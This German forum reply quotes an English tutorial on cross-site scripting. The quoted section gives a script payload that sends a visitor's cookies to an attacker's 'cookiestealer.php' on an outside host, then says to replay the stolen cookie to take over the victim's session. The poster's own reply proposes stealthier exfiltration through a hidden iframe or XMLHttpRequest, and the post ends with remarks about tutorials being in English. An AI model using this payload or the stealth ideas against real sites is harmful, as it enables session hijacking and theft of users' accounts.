Zitat Zitat von novaca!ne Beitrag anzeigen
$ Inject the following code in your target website:

http://www.site.ru/google.php?search=<script>location.href = 'http://phishingsite.ru/cookiestealer.php?cookie='+document.cookie;</script>

$ Then the victim's cookie (target's website user who visited the url above) should
$ appear in the log.txt.
$ Now you simply need to insert the cookie (with e.g. live http headers firefox addon)
$ and use it.

Das ist aber etwas auffällig wenn die Person auf einmal auf eine andere Webseite weitergeleitet wird? Ich würde in dem Fall eher ein kleines iframe oder so etwas benutzen. Vielleicht kriegt man es auch mit einem XMLHttpRequest hin die Daten an eine andere Seite zu senden. Das wäre noch unauffälliger, sollte aber von den Browsern verhindert werden.

Ansonsten muss ich mich meinen Vorrednern anschließen, im Grunde stand da nur das drinnen was ich ohnehin schon wusste. Womit ich nichts anfangen kann ist "DOM based XSS". Wenn du darüber nochwas schreiben könntest würdest du mir zumindest was neues erzählen. Das würde mich wirklich interessieren, vor allem weil ich jetzt auch nicht weiß was ich als Website Coder dagegen tun kann. Die anderen beiden sind ein alter Hut und werden auf meinen Seiten sicher nicht funktionieren.

Zu dem Thema, dass das Tutorial auf Englisch ist: Heutzutage gibt es so viele Informationen auf Englisch. Das braucht man inzwischen fast überall. Und die meisten lernen das auch in der Schule, also sollte eigentlich fast jeder genug Englisch können um das zu lesen. Mir ist es inzwischen eh egal ob die Infos zu einem Thema auf Englisch oder Deutsch sind, ich kann beides gut genug lesen. Es gibt ohnehin unzählige Informationen die man auf Deutsch nicht bekommt bzw. nur in schlechter Qualität (Da fallen mir spontan die ganzen Automatisch übersetzten Seiten von MSDN ein - bevor man die Liest kann man die auch geradee ordentlich auf Englisch lesen).